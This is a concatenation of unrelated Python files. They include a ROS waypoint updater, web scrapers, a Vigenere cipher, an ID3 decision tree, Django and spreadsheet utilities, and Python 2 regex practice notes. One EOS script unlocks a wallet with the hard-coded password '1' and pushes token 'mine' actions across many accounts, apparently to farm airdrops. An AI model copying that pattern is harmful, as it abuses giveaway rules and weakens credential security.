msg.pose.orientation.z,
msg.pose.orientation.w]
euler = tf.transformations.euler_from_quaternion(quaternion)
self.car_yaw = euler[2]
self.car_closest_wp = self.get_closest_waypoint(self.car_x, self.car_y)
self.check_tl()
self.publishFinalWaypoints()
def publishFinalWaypoints(self):
#if not received base_waypoints message, not able to update final_waypoints
if self.base_waypoints is None:
return
closestWaypoint = self.car_closest_wp #self.get_closest_waypoint(self.car_x, self.car_y)
car_velocity = self.car_velo
target_velocity = self.target_velo
rospy.loginfo("Current car velo = %s", car_velocity)
#updating final_waypoints
rospy.loginfo("updating waypoints")
rospy.loginfo("publishing velocity %s", target_velocity)
self.first_waypoint = closestWaypoint
lenWaypoints = len(self.base_waypoints)
final_waypoints_msg = Lane()
for i in range(closestWaypoint, min(closestWaypoint + LOOKAHEAD_WPS, lenWaypoints)):
wp = self.base_waypoints[i]
new_final_wp = Waypoint()
new_final_wp.pose = wp.pose
new_final_wp.twist.twist.linear.x = wp.twist.twist.linear.x
if(self.braking == 1):
stop_line_wp = self.base_waypoints[self.stop_at_wp-2]
if (i >= self.stop_at_wp): # For waypoints ahead of intended stop point, set velocities 0
vel = 0.
else:
dist = self.dist(wp.pose.pose.position, stop_line_wp.pose.pose.position)
vel = math.sqrt(2 * MAX_DECEL * dist)
if (vel < 1.):
vel = 0
#rospy.loginfo("dist = %s,cal_vel = %s, vel = %s", dist, vel, wp.twist.twist.linear.x)
# Override velocity
new_final_wp.twist.twist.linear.x = min(vel,wp.twist.twist.linear.x)
#rospy.loginfo("velo %s = %s, car velo = %s",i,new_final_wp.twist.twist.linear.x, car_velocity)
final_waypoints_msg.waypoints.append(new_final_wp)
self.final_waypoints_pub.publish(final_waypoints_msg)
def waypoints_cb(self, msg):
#updating base_waypoints
if self.base_waypoints is None:
rospy.loginfo("rcvd base waypoints")
self.base_waypoints = msg.waypoints
def traffic_waypoint_cb(self,msg):
self.tl_X = msg.next_light.pose.pose.position.x
self.tl_Y = msg.next_light.pose.pose.position.y
self.tl_S = msg.next_light_detection
self.tl_wp = msg.next_light_waypoint
self.tl_stop_wp = msg.stop_line_waypoint
#self.check_tl()
def traffic_cb(self, msg):
#TODO: Callback for /traffic_waypoint message. Implement
#updating traffic light waypoints
self.tl_list = msg.lights
#rospy.loginfo("updated state = %s of TL 0 @ x = %s, y = %s", self.tl_list[0].state, self.tl_list[0].pose.pose.position.x, self.tl_list[0].pose.pose.position.y)
#rospy.loginfo("updated state = %s of TL 1 @ x = %s, y = %s", self.tl_list[1].state, self.tl_list[1].pose.pose.position.x, self.tl_list[1].pose.pose.position.y)
#rospy.loginfo("updated state = %s of TL 2 @ x = %s, y = %s", self.tl_list[2].state, self.tl_list[2].pose.pose.position.x, self.tl_list[2].pose.pose.position.y)
#rospy.loginfo("updated state = %s of TL 3 @ x = %s, y = %s", self.tl_list[3].state, self.tl_list[3].pose.pose.position.x, self.tl_list[3].pose.pose.position.y)
def obstacle_cb(self, msg):
# TODO: Callback for /obstacle_waypoint message. We will implement it later
pass
def get_waypoint_velocity(self, waypoint):
return waypoint.twist.twist.linear.x
def set_waypoint_velocity(self, waypoints, waypoint, velocity):
waypoints[waypoint].twist.twist.linear.x = velocity
def distance(self, waypoints, wp1, wp2):
dist = 0
dl = lambda a, b: math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2)
for i in range(wp1, wp2+1):
dist += dl(waypoints[wp1].pose.pose.position, waypoints[i].pose.pose.position)
wp1 = i
return dist
def get_closest_waypoint(self, X, Y):
closestLen = 100000
closestWaypoint = 0
for i in range(self.first_waypoint, len(self.base_waypoints)):
wp = self.base_waypoints[i]
dist = math.sqrt((X - wp.pose.pose.position.x)**2
+ (Y - wp.pose.pose.position.y)**2)
if dist < closestLen:
closestLen = dist
closestWaypoint = i
else:
break
closest_wp = self.base_waypoints[closestWaypoint]
heading = math.atan2(closest_wp.pose.pose.position.y - Y,
closest_wp.pose.pose.position.x - X)
if closestWaypoint < len(self.base_waypoints) - 1:
angle = abs(self.car_yaw - heading)
if (angle > math.pi/4):
closestWaypoint += 1
closestWaypoint %= len(self.base_waypoints)
return closestWaypoint
def get_closest_tl(self):
closestLen = 100000
closestTL = -1
for i in range(len(self.tl_list)):
tl = self.tl_list[i]
dist = math.sqrt((self.car_x - tl.pose.pose.position.x)**2
+ (self.car_y - tl.pose.pose.position.y)**2)
if dist < closestLen:
closestLen = dist
closestTL = i
closest_tl = self.tl_list[closestTL]
heading = math.atan2(closest_tl.pose.pose.position.y - self.car_y,
closest_tl.pose.pose.position.x - self.car_x)
angle = abs(self.car_yaw - heading)
if (angle > math.pi/4):
closestTL += 1
closestTL %= len(self.tl_list)
closest_tl = self.tl_list[closestTL]
closestLen = math.sqrt((self.car_x - closest_tl.pose.pose.position.x)**2
+ (self.car_y - closest_tl.pose.pose.position.y)**2)
rospy.loginfo("changing TL to %s", closestTL)
self.tl_Y = closest_tl.pose.pose.position.y
self.tl_X = closest_tl.pose.pose.position.x
self.tl_S = closest_tl.state
return closestTL
def check_tl(self):
if self.car_x is not None and self.tl_wp is not None:
closestWaypoint = self.tl_wp
rospy.loginfo("tl_x = %s, tl_y = %s, state = %s, WP = %s, stop_wp = %s", self.tl_X, self.tl_Y, self.tl_S, self.tl_wp, self.tl_stop_wp)
dist = self.distance(self.base_waypoints, self.car_closest_wp, closestWaypoint)
rospy.loginfo("closest visible tl at %s distance", dist)
# Our traffic_waypoint publishes only when the next light is red/orange or unknown.
#self.update_tl = True
if dist < 35 and dist > 18 and self.tl_S == 0: ### STOP!!!
self.target_velo = 0.0
self.braking = 1
self.stop_at_wp = self.tl_stop_wp
elif dist < 100 and dist > 34:
self.target_velo = 5
self.braking = 1
self.stop_at_wp = self.tl_stop_wp
else: ## FULL THROTTLE!!
self.target_velo = TARGET_SPEED
self.braking = 0
#rospy.loginfo("Setting velo to %s",self.target_velo)
def dist(self, p1, p2):
return math.sqrt(pow(p1.x-p2.x,2) + pow(p1.y-p2.y,2))
def current_velocity_cb(self, msg):
self.car_velo = msg.twist.linear.x
if __name__ == '__main__':
try:
WaypointUpdater()
except rospy.ROSInterruptException:
rospy.logerr('Could not start waypoint updater node.')
|
import requests
import time
from bs4 import BeautifulSoup
import os
import re
import urllib.request
import json
#Goal:Find all the jackets that the prices are above $2000 usd, and download the pictures.
#func 1 => find "get_web_page(url)" return resp.text:
#func 2 => Go to each page(39 pages in total), and parse all files, then return data(Brand name, item name, price, url of the picture)
#func 3 => Enter each url and then download pictures.
# main Func => Determine whether the price is above $2000, if so, then func 3 to download the picture
url = "https://www.ssense.com/en-tw/men/jackets-coats"
def get_web_page(url):
resp = requests.get(url)
if resp.status_code != 200:
print('Invalid url:', resp.url)
return None
else:
return resp.text
def enter_every_page(dom):
items = []
soup = BeautifulSoup(dom,"html5lib")
all_items = soup.find_all("figure","browsing-product-item")
for item in all_items:
brand_name = item.find("p","bold").text.strip()
item_name = item.find("p","product-name-plp").text.strip()
price = item.find("span","price").text.replace("$","")
item_pic_link = item.find_all("meta")[1]["content"] #item.find("picture").find("source", {'media': "(min-width: 1025px)"})["srcset"]
items.append({
"brand_name":brand_name,
"item_name":item_name,
"price":price,
"item_pic_link":item_pic_link
})
for i in range(2,39+1):
new_dom = get_web_page(url + "?page="+str(i))
if new_dom:
soup = BeautifulSoup(new_dom, "html5lib")
all_items = soup.find_all("figure", "browsing-product-item")
for item in all_items:
brand_name = item.find("p", "bold").text.strip()
item_name = item.find("p", "product-name-plp").text.strip()
price = item.find("span", "price").text.replace("$", "")
item_pic_link = item.find_all("meta")[1][
"content"] # item.find("picture").find("source", {'media': "(min-width: 1025px)"})["srcset"]
items.append({
"brand_name": brand_name,
"item_name": item_name,
"price": price,
"item_pic_link": item_pic_link
})
return items
def save(img_url, title): #Download the link
if img_url:
try:
dname = title.strip() # use strip() to delete the blank in front of or in the back of the string
if not os.path.exists(dname):
os.makedirs(dname)
fname = img_url.split('/')[-1] # set last string of url as file name
urllib.request.urlretrieve(img_url, os.path.join(dname, fname))
# use urllib.request.urlretrieve(documentname, filename) to download pics into files.
except Exception as e:
print(e)
if __name__ == '__main__':
if get_web_page(url):
all_items = enter_every_page(get_web_page(url))
print(all_items)
for i in range(0,len(all_items)-1):
if int(all_items[i]["price"]) >= 2000:
single_title = all_items[i]["brand_name"]
single_href = all_items[i]["item_pic_link"]
save(single_href, single_title)
|
# def max_difference(a):
# max_difference = -float("inf")
# for i in range(len(a)):
# for j in range(i+1, len(a)):
# if a[j] - a[i] > max_difference:
# max_difference = a[j] - a[i]
# return max_difference
def max_difference(a):
maxDifference = -float("inf")
min_number = float("inf")
for elem in a:
if elem - min_number > maxDifference:
maxDifference = elem - min_number
if elem < min_number:
min_number = elem
return maxDifference
print "Max difference is", max_difference([2, 3, 10, 2, 4, 8, 1])
print "Max difference is", max_difference([7, 9, 5, 6, 3, 2])
|
from typing import Optional
class vigenere_cipher:
def __init__(self):
self.capitalized = []
# This function helps preserve capitalization
def get_num(self, char, idx):
num = ord(char)
if (num > 64 and num < 91):
num = num - 65
self.capitalized.append(True)
elif (num > 96 and num < 123):
num = num - 97
self.capitalized.append(False)
else : raise Exception("Please only use alphabetical characters in the text!")
return num
def encipher(self, text: str, key: str, shift_left: Optional[bool] = True):
if not key: raise Exception("Please enter a valid key!")
key = ''.join(key.split()).lower()
if (not key.isalpha()): raise Exception("Please only use alphabetical characters in the key Vigenere cipher!")
key_len = len(key)
text = ''.join(text.split())
result = ''
self.capitalized = []
if (shift_left):
for i, char in enumerate(text):
key_val = ord(key[(i%key_len)])-97
num = self.get_num(char, i)
num = ((num+key_val)%26) + 65
if (not self.capitalized[i]): num += 32
result += chr(num)
else:
for i, char in enumerate(text):
key_val = ord(key[(i % key_len)]) - 65
num = self.get_num(char, i)
num = ((num - key_val) % 26) + 65
if (not self.capitalized[i]): num += 32
result += chr(num)
return result
def decipher(self, text: str, key: str, shift_left: Optional[bool] = True):
if not key: raise Exception("Please enter a valid key!")
key = ''.join(key.split()).lower()
if (not key.isalpha()): raise Exception("Please only use alphabetical characters in the key for Vigenere cipher!")
key_len = len(key)
text = ''.join(text.split())
result = ''
self.capitalized = []
if (shift_left):
for i, char in enumerate(text):
key_val = ord(key[(i%key_len)])-97
num = self.get_num(char, i)
num = ((num-key_val)%26) + 65
if (not self.capitalized[i]): num += 32
result += chr(num)
else:
for i, char in enumerate(text):
key_val = ord(key[(i % key_len)]) - 65
num = self.get_num(char, i)
num = ((num + key_val) % 26) + 65
if (not self.capitalized[i]): num += 32
result += chr(num)
return result
|
import demistomock as demisto # noqa: F401
from CommonServerPython import *
def main() -> None:
ORANGE_HTML_STYLE = "color:#FF9000;font-size:275%;>"
GREEN_HTML_STYLE = "color:#00CD33;font-size:275%;>"
RED_HTML_STYLE = "color:#FF1744;font-size:275%;>"
DIV_HTML_STYLE = "display:block;text-align:center;"
try:
radar_files_modified = demisto.executeCommand("Print", {"value": "${incident.labels.radar_files_modified}"})
radar_files_modified = radar_files_modified[0]["Contents"]
if not radar_files_modified:
html = f"<div style={DIV_HTML_STYLE}><h1 style={GREEN_HTML_STYLE}{str(radar_files_modified)}</h1></div>"
else:
html = f"<div style={DIV_HTML_STYLE}><h1 style={RED_HTML_STYLE}{str(radar_files_modified)}</h1></div>"
except KeyError:
html = f"<div style={DIV_HTML_STYLE}><h1 style={ORANGE_HTML_STYLE}No Results Found</h1></div>"
demisto.results({
'ContentsFormat': formats['html'],
'Type': entryTypes['note'],
'Contents': html
})
# python2 uses __builtin__ python3 uses builtins
if __name__ == '__builtin__' or __name__ == 'builtins':
main()
|
from datetime import datetime
def notnight(func):
def wrapper():
if 3 <=datetime.now().hour < 20 :
print('You can shout')
func()
else:
print('Maybe its night time.....SSH! donot shout')
pass
return wrapper
@notnight # shouting=notnight(shouting)
def shouting():
print('OHHHHHHHHHHHHHHHHHHHHHOOOOOOOOOOHOOOOOOOHO')
shouting() |
import os
import json
from log import loggingSetting
from ut import pushaction, unlock, getAccounts, runPool, buyram
logger = loggingSetting("airdrop")
def main(password):
pass
# for i in x[1:]:
# print(pushaction("betdicetoken", "signup", [i, "1000.0000 DICE"], i)) # 1000dice
# print(
# pushaction("xxxsevensxxx", "signup", [i, "10000.0000 SEVEN"], i) # 10000 SEVEN
# )
# print(pushaction("efinitysicbo", "claim", [i], i)) # 100 CHIPS
# print(pushaction("roulettespin", "login", [i, "gy2dgmztgqge"], i))
# print(pushaction("efinitychips", "claim", [i, "gy2dgmztgqge"], i))
# print(pushaction("grandpacoins", "mine", [i, "4,BTC", "gy2dgmztgqge"], i))
# print(pushaction("grandpacoins", "mine", [i, "4,ETH", "gy2dgmztgqge"], i))
# print(pushaction("grandpacoins", "mine", [i, "4,DOGE", "gy2dgmztgqge"], i))
# print(pushaction("poormantoken", "signup", [i, "0.0000 POOR"], i))
# print(pushaction("trybenetwork", "claim", [i], i))
# print(pushaction("wizznetwork1", "signup", [i, "0.0000 WIZZ"], i))
if __name__ == "__main__":
password = "1"
unlock(password)
accounts = getAccounts()
def run(i):
print(pushaction("grandpacoins", "mine", [i, "4,BTC", "gy2dgmztgqge"], i))
print(pushaction("grandpacoins", "mine", [i, "4,ETH", "gy2dgmztgqge"], i))
print(pushaction("grandpacoins", "mine", [i, "4,DOGE", "gy2dgmztgqge"], i))
# print(pushaction("eosenbpocket", "signup", [i, "1000.0001 ENB", i], i))
# t = pushaction("eoscubetoken", "signup", [i, "0.0000 CUBE"], i)
# print(t)
# t = pushaction("eosindiegame", "claim", [i, "100.0000 IGC"], i)
# if b"you have already signed up" not in t:
# print(t)
# if b"has insufficient ram" in t:
# buyram("gy2dgmztgqge", i, 2)
# print(pushaction("eosindiegame", "claim", ["100.0000 IGC", i], i))
runPool(run, accounts)
# run("gy2dgmztgqge")
|
import pandas as pd
import numpy as np
class ID3:
""" Public Method """
# Uses the ID3 algorithm to generates the decision tree
@staticmethod
def generate_tree(df: pd.DataFrame, attribute_dict: {}, use_gain_ratio: bool, use_pruning: bool) -> {}:
if len(df) == 0:
return {}
candidates = list(df.columns.values[:-1])
ID3.__instance_threshold = len(df) // 100
return ID3.__generate_tree(df, candidates, attribute_dict, use_gain_ratio, use_pruning)
""" Private Helper Methods """
# Helps generates the tree by recursively creating dictionaries
@staticmethod
def __generate_tree(df: pd.DataFrame, candidates: list, attribute_dict: {}, use_gain_ratio: bool,
use_pruning: bool) -> {}:
class_label = df.columns[-1]
# Base case #1: No more attributes to partition over. Return most common class label
if not candidates:
return df[class_label].value_counts().idxmax()
# Base case #2: Entropy has hit 0. All instances in the DataFrame have the same class label
if not ID3.__entropy(df):
return df[class_label].iloc[0]
# Base case #3: Pre-pruning
if use_pruning and len(df) < ID3.__instance_threshold :
return df[class_label].value_counts().idxmax()
# Generate tree by finding the next optimal attribute to partition over
tree, attribute_tree = {}, {}
next_attribute = ID3.__next_attribute(df, candidates, use_gain_ratio)
updated_candidates = candidates.copy()
updated_candidates.remove(next_attribute)
for attribute_value in attribute_dict[next_attribute]:
partitioned_df = df[df[next_attribute] == attribute_value]
# Recurse only if partitioned DataFrame is not empty
if len(partitioned_df) != 0:
attribute_tree[attribute_value] = ID3.__generate_tree(partitioned_df, updated_candidates,
attribute_dict, use_gain_ratio, use_pruning)
# If partitioned DataFrame is empty, return most common class label
else:
attribute_tree[attribute_value] = df[class_label].value_counts().idxmax()
tree[next_attribute] = attribute_tree
return tree
# Get the attribute that yields the highest gain
@staticmethod
def __next_attribute(df: pd.DataFrame, candidates: list, use_gain_ratio: bool) -> str:
attribute_gains = {}
for attribute in candidates:
if use_gain_ratio:
attribute_gains[attribute] = ID3.__gain_ratio(df, attribute)
else:
attribute_gains[attribute] = ID3.__information_gain(df, attribute)
return max(attribute_gains, key=attribute_gains.get)
# Calculates the information gain acquired from partitioning over attribute
@staticmethod
def __information_gain(df: pd.DataFrame, attribute: str) -> float:
if len(df) == 0:
return 0
# Calculate entropy before partitioning
entropy_before = ID3.__entropy(df)
# Calculate entropy after partitioning
entropy_after = 0
for attribute_value in df[attribute].unique():
mask = df[attribute] == attribute_value
partitioned_df = df[mask]
entropy_after += len(partitioned_df) / len(df) * ID3.__entropy(partitioned_df)
# Information gain = entropy before decision - entropy after decision
return entropy_before - entropy_after
# Calculates the entropy of DataFrame
@staticmethod
def __entropy(df: pd.DataFrame) -> float:
# Get the class ratios by dividing the number of class instances by the total number of instances
class_ratios = []
class_label = df.columns[-1]
total_instances = len(df.index)
for class_value in df[class_label].unique():
mask = df[class_label] == class_value
partitioned_df = df[mask]
partitioned_instances = len(partitioned_df.index)
class_ratios.append(partitioned_instances / total_instances)
# Entropy equation
return sum([-class_ratio * np.log2(class_ratio) for class_ratio in class_ratios])
# Calculates the gain ratio acquired from partitioning over attribute
@staticmethod
def __gain_ratio(df: pd.DataFrame, attribute: str) -> float:
information_gain = ID3.__information_gain(df, attribute)
split_information = ID3.__split_information(df, attribute)
return information_gain / split_information
# Calculates the split information
@staticmethod
def __split_information(df: pd.DataFrame, attribute: str) -> float:
attribute_ratios = []
total_instances = len(df)
for attribute_value in df[attribute].unique():
mask = df[attribute] == attribute_value
partitioned_instances = len(df[mask])
attribute_ratios.append(partitioned_instances / total_instances)
return sum([-attribute_ratio * np.log2(attribute_ratio) for attribute_ratio in attribute_ratios])
""" Private Field """
__instance_threshold = 0
|
# import openpyxl
# wb=openpyxl.load_workbook('各班成绩表.xlsx')
# ws=wb.active
# rngs=list(ws.values)
# d={}
# for row in rngs[1:]:
# if row[0] in d.keys():
# d[row[0]]+=[row]
# else:
# d[row[0]]=[row]
# nwb=openpyxl.Workbook()
# for k,v in sorted(d.items()):
# nws=nwb.create_sheet(k)
# nws.append(rngs[0])
# for r in v:
# nws.append(r)
# nwb.remove(nwb.worksheets[0])
# nwb.save('拆分.xlsx')
import openpyxl
wb = openpyxl.load_workbook("各班成绩表.xlsx")
ws = wb.active
grade = dict()
for row in list(ws.values)[1:]:
if row[0] in grade.keys():
grade[row[0]] += [row]
else:
grade[row[0]] = [row]
nwb = openpyxl.Workbook()
for k,v in sorted(grade.items()):
nws = nwb.create_sheet(k)
nws.append(list(ws.values)[0])
for r in v:
nws.append(r)
nwb.remove(nwb.worksheets[0])
nwb.save("拆分到表.xlsx")
|
import pandas as pd
import os
cwd = os.getcwd()
project_wd = os.path.dirname(cwd)
download_wd = os.path.join(project_wd, "Download_Data")
data_wd = os.path.join(download_wd, "Data")
countries_wd = os.path.join(data_wd, "all_Countries.csv")
us_states_wd = os.path.join(data_wd, "us_States.csv")
fips_states_wd = os.path.join(data_wd, "fips_state.csv")
countries = pd.read_csv(countries_wd)
us_states = pd.read_csv(us_states_wd)
state_codes = pd.read_csv(fips_states_wd)
|
# Django
from django.contrib import admin
# Models
from .models import Onboard
class OnboardAdmin(admin.ModelAdmin):
model = Onboard
list_display = ('account', 'isOnboarded')
list_filter = ('account',)
search_fields = ('account',)
ordering = ('account',)
admin.site.register(Onboard, OnboardAdmin)
|
import requests
from bs4 import BeautifulSoup
import pandas as pd
import time
#srp-listing clickable-area paid-listing astro-dxc
#srp-listing clickable-area gump
#srp-listing clickable-area sp
#srp-listing clickable-area rd
#srp-listing clickable-area mdm
main_list = []
def extract(url):
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html.parser')
arts_1 = soup.find_all('div', class_ = 'srp-listing clickable-area paid-listing astro-dxc')
arts_2 = soup.find_all('div', class_ = 'srp-listing clickable-area gump')
arts_3 = soup.find_all('div', class_ = 'srp-listing clickable-area sp')
arts_4 = soup.find_all('div', class_ = 'srp-listing clickable-area rd')
arts_5 = soup.find_all('div', class_ = 'srp-listing clickable-area mdm')
arts = arts_1 + arts_2 + arts_3 + arts_4 + arts_5
return arts
def transform(articles):
for item in articles:
name = item.find('a', class_ = 'business-name').text
address = item.find('p', class_ = 'adr').text.strip().replace('\n', '')
try:
website = item.find('a', class_ = 'track-visit-website')['href']
except:
website = 'NO WEBSITE'
try:
tel = item.find('div', class_ = 'phones phone primary').text.strip()
except:
tel = 'NO TELLEPHONE'
business = {
'Name': name,
'Adress': address,
'Website': website,
'Tellephone': tel
}
main_list.append(business)
return
def load():
df = pd.DataFrame(main_list, columns= ["Name", "Adress", "Website", "Tellephone"])
print(main_list)
print(df)
df.to_excel('LA_Dentists.xls', index= False, columns= ["Name", "Adress", "Website", "Tellephone"])
for x in range(1,3):
print(f'Getting page {x}')
try:
articles = extract(f'https://www.yellowpages.com/search?search_terms=dentist&geo_location_terms=Los%20Angeles%2C%20CA&page={x}')
transform(articles)
time.sleep(2)
except:
break
load()
print('Saved to Excel') |
import os
import logging
def logModul(topicName,fileName):
"""
##设置日志处理
:param topicName: 日志主题
:param fileName: 日志存储文件
:return:
"""
logger = logging.getLogger(topicName)
logging.basicConfig(level=logging.INFO)
ch = logging.StreamHandler()
fh = logging.FileHandler(os.path.join(os.path.dirname(os.getcwd()),'logs' ,fileName))
fh.setLevel(logging.WARNING)
logger.addHandler(ch)
logger.addHandler(fh)
file_formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
console_formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
ch.setFormatter(console_formatter)
fh.setFormatter(file_formatter)
return logger |
# -*-coding:utf-8-*-
# def verify(num):
# if num > 0:
# print "正数"
# if num < 0:
# print "负数"
# if num == 0:
# print "零"
# num = float(raw_input("请输入一个数:"))
# verify(num)
# list = [2,7,6,8,10]
# print sum(list)
# avg = float(sum(list))/float(len(list))
# print avg
# list = []
# try:
# num = raw_input("请输入5个数字,以逗号隔开:")
# for i in num.split(','):
# list.append(float(i))
# avg = float(sum(list))/float(len(list))
# print avg
# except:
# print "输入有误"
# a = raw_input("请输入一个字符串:")
# # for i in a:
# # print i
# i = 0
# while i < len(a):
# print a[i]
# i = i + 1
# while True:
# num = raw_input("请输入一个0到100的数:")
# try:
# if float(num) > 0 and float(num) < 100:
# print "OK"
# break
# else:
# print "输入的数错误,请重新输入"
# except :
# print "输入的不是数字"
#
# stack = [] #定义堆栈列表
#
# def pushit():
# stack.append(raw_input('Enter new string:').strip())
#
# def popit():
# if len(stack) == 0:
# print 'Cannot pop from an empty stack!'
# else:
# print 'Removed [','stack.pop()',']'
#
# def viewstack():
# print stack
#
# CMDs = {'u':pushit,'o':popit,'v':viewstack}
# def showmenu():
# pr = """
# p(U)sh
# p(O)p
# (V)iew
# (Q)uit
# Enter choice:
# """
# while True:
# while True:
# try:
# choice = raw_input(pr).strip()[0].lower()
# except (EOFError,KeyboardInterrupt,IndexError):
# choice = 'q'
# print '\nYou picked:[%s]' % choice
# if choice not in 'uovq':
# print 'Invalid option,try again'
# else:
# break
#
# if choice == 'q':
# break
#
# CMDs[choice]()
#
# if __name__ == '__main__':
# showmenu()
# db = {}
#
# def newuser():
# prompt = 'login desired:'
# while True:
# name = raw_input(prompt)
# if name in db.keys():
# prompt = "name taken,try another:"
# continue
# else:
# break
# pwd = raw_input("passwd:")
# db[name]=pwd
#
# def olduser():
# name = raw_input("login:")
# pwd = raw_input("passwd:")
# passwd = db.get(name)
# if passwd == pwd:
# print 'welcome back ',name
# else:
# print "login incorrect"
#
# def showmenu():
# prompt = """
# (N)ew User Login
# (E)xisting User Login
# (Q)uit
# Enter choice:
# """
# done = False
# while not done:
# chosen = False
# while not chosen:
# try:
# choice = raw_input(prompt).strip()[0].lower()
# except (EOFError,KeyboardInterrupt):
# choice = 'q'
# print '\nYou picked:[%s]' % choice
# if choice not in 'neq':
# print 'invalid option,try again'
# else:
# chosen = True
# done = True
#
# newuser()
# olduser()
# if __name__ == "__main__":
# showmenu()
# #float_v1.0
# def safe_float(obj):
# try:
# return float(obj)
# except ValueError:
# pass
#float_v1.1
# def safe_float(obj):
# try:
# retval = float(obj)
# except ValueError:
# retval = "could not convert non-number to float"
# except TypeError:
# retval = "object type cannot be converted to float"
# return retval
#
# aaa = safe_float([111,222])
# print aaa
# import xlrd
# log = open('logfile.txt','w')
# try:
# xlrd.function()
# except:
# log.write("*** caught exception in module\n")
# else:
# log.write("*** no exceptions caught\n")
# log.close()
# from time import ctime,sleep
# def tsfunc(func):
# def wrappedFunc():
# print "[%s] %s() called" % (ctime(),func.__name__)
# return func()
# return wrappedFunc
# @tsfunc
# def foo():
# pass
# foo()
# sleep(4)
# for i in range(2):
# sleep(1)
# foo()
# def convert(func,seq):
# "conv.sequence of numbers to same type"
# return [func(eachNum) for eachNum in seq]
# myseq = (123,45.67,-6.2e8,9999999L)
# print convert(int,myseq)
# print convert(long,myseq)
# print convert(float,myseq)
# def \
# taxMe(cost,rate = 0.0825):
# return cost + (cost * rate)
# print taxMe(100)
# print taxMe(100,0.05)
# from urllib import urlretrieve
# def firstNonBlank(lines):
# for eachLine in lines:
# if not eachLine.strip():
# continue
# else:
# return eachLine
#
# def firstLast(webpage):
# f = open(webpage)
# lines = f.readlines()
# f.close()
# print firstNonBlank(lines)
# lines.reverse()
# print firstNonBlank(lines)
#
# def download(url = 'http://www.baidu.com',process = firstLast):
# try:
# retval = urlretrieve(url)[0]
# except IOError:
# retval = None
# if retval:
# process(retval)
# if __name__ == '__main__':
# download()
# #GUI小例
# from functools import partial
# import Tkinter
# root = Tkinter.Tk()
# MyButton = partial(Tkinter.Button,root,fg='white',bg='blue')
# b1 = MyButton(text='Button 1')
# b2 = MyButton(text='Button 2')
# qb = MyButton(text='Quit',bg='red',command=root.quit)
# b1.pack()
# b2.pack()
# qb.pack(fill=Tkinter.X,expand=True)
# root.title('PFAs!')
# root.mainloop()
# def countToFour1():
# for eachNum in range(5):
# print eachNum
#
# def countToFour2(n):
# for eachNum in range(n,5):
# print eachNum
#
# def countToFour3(n=1):
# for eachNum in range(n,5):
# print eachNum
#
# # countToFour1()
# countToFour2(5)
# countToFour3(5)
# a = map(None,[1,2,3],['abc','edf','bbb','ddd'])
# print a
# #调用sys.exit()退出
# import sys
# def usage():
# print 'At Least 2 arguments (inc1.cmd name).'
# print 'usage:args.py arg1 arg2 [arg3...]'
# sys.exit(1)
#
# argc = len(sys.argv)
# if argc<3:
# usage()
# print "number of args entered:",argc
# print "args (inc1.cmd name) were:".sys.argv
# import sys
# prev_exit_func = getattr(sys,'exitfunc',None)
# def my_exit_func(old_exit = prev_exit_func):
# #perform cleanup 进行清理
# if old_exit is not None and callable(old_exit):
# old_exit()
#
# sys.exitfunc = my_exit_func()
#单线程例子
# from time import sleep,ctime
#
# def loop0():
# print 'start loop0 at:',ctime()
# sleep(4)
# print 'loop0 done at:',ctime()
#
# def loop1():
# print 'start loop1 at:',ctime()
# sleep(2)
# print 'loop1 done at:',ctime()
#
# def main():
# print 'starting at:',ctime()
# loop0()
# loop1()
# print 'all DONE at :',ctime()
#
# if __name__ == '__main__':
# main()
# 多线程例子
# import thread
# from time import sleep,ctime
#
# def loop():
# print 'start loop0 at:',ctime()
# sleep(4)
# print 'loop0 done at:',ctime()
#
# def loop1():
# print 'start loop1 at:',ctime()
# sleep(2)
# print 'loop1 done at:',ctime()
#
# def main():
# print 'starting at:', ctime()
# thread.start_new_thread(loop(), ())
# thread.start_new_thread(loop1(), ())
# sleep(6)
# print 'all Done at:', ctime()
#
# if __name__ == '__main__':
# main()
# import thread
# from time import sleep,ctime
#
# loops = [4,2]
#
# def loop(nloop,nsec,lock):
# print 'start loop',nloop,'at:',ctime()
# sleep(nsec)
# print 'loop',nloop,'done at:',ctime()
# lock.release()
#
# def main():
# print 'starting at:',ctime()
# locks = []
# nloops = range(len(loops))
#
# for i in loops:
# lock = thread.allocate_lock()
# lock.acquire()
# locks.append(lock)
#
# for i in nloops:
# thread.start_new_thread(loop,(i,loops[i],locks[i]))
#
# for i in nloops:
# while locks[i].locked():
# pass
#
# print 'all DONE at:',ctime()
#
# if __name__ == '__main__':
# main()
# import Tkinter
# label = Tkinter.Label(top,text = 'Hello World !')
# label.pack()
#
# quit = Tkinter.Button(top,text = 'Quit',command = top.quit,bg = 'red',fg = 'blue')
# quit.pack(fill = Tkinter.X,expand = 1)
# from Tkinter import *
# def resize(ev = None):
# label.config(font = 'Helvetica -%d bold' % scale.get())
# top = Tk()
# top.geometry('250x250')
# label = Label(top,text = '孟庆秀',font = 'Helvetica -12 bold')
# label.pack(fill = Y,expand = 1)
#
# scale = Scale(top,from_ = 10,to = 40,orient = HORIZONTAL,command = resize)
# scale.set(12)
# scale.pack(fill = X,expand = 1)
#
# quit = Button(top,text = "Quit",command = top.quit,activeforeground = 'white',activebackground = 'red')
# quit.pack()
#
#
# mainloop()
# def sum_jc(n):
# sum_n = 0
# for i in range(n):
# jc = 1
# for j in range(i+1):
# jc = jc*(j+1)
# sum_n = sum_n + jc
# return sum_n
# if __name__ == '__main__':
# m = sum_jc(20)
# print m
# def get_num(a):
# list = []
# no = 0
# for i in a:
# for j in a:
# for m in a:
# sum = i*100 + j *10 + m
# list.append(sum)
# # print sum
# no = no + 1
# return list,no
# if __name__ == '__main__':
# list = [1,2,3,4]
# res,no = get_num(list)
# print no
# print res
# # for i in res:
# # print i
# def reward(profit):
# if profit*10000<=100000:
# res = profit*10000*0.1
# if 100000<profit*10000<200000:
# res = 100000*0.1 + (profit*10000-100000)*0.075
# if
# import math
# i = 1
# while True:
# i = i + 1
# if int(sqrt())
import re
secret_code = 'honohoihbpihbxxIxx112dsfowjfn2oxxlovexx9ohhdfwxxyouxxjph23h'
# .的使用举例
# a = 'xy123'
# b = re.findall('x.',a)
# print b
# *的使用举例
# a = 'xxyx1x23'
# b = re.findall('x*',a)
# print b
# ?的使用举例
# a = 'xxyx12x3'
# b = re.findall('x?',a)
# print b
# .*的使用举例
b = re.findall('xx.*xx',secret_code)
print b
c = re.findall('xx.*?xx',secret_code)
print c
d = re.findall('xx(.*?)xx',secret_code)
print d
|
from django.shortcuts import render
